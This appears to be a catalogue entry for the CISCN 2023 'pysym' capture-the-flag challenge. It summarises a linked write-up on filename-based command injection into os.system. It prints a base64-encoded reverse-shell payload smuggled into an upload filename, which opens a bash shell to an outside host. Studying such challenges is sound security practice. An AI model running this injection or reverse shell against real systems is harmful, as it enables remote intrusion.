| ID: | 11090 |
|---|---|
| 标题: | [CISCN 2023 华北]pysym |
| 描述: | None |
| 类型: | RCE |
| 网站: | NSSCTF |
| 题目链接: | https://www.nssctf.cn/problem/4098 |
| 赛事: | CISCN |
| 年度: | 2023 |
| Flag值: | 无 |
| writeup: |
https://blog.csdn.net/m0_73512445/article/details/134458958 解析:网页3详细分析了[CISCN 2023 华北]pysym的漏洞利用过程,指出通过修改上传文件名触发os.system命令注入漏洞,利用base64编码绕过过滤,构造反弹shell的payload(如1.tar echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC81aTc4MTk2M3AyLnlpY3AuZnVuLzU4MjY1IDA+JjEn base64 -d bash ),并验证了漏洞可成功执行命令 3。该链接直接包含解题代码分析与攻击步骤,符合验证要求。 |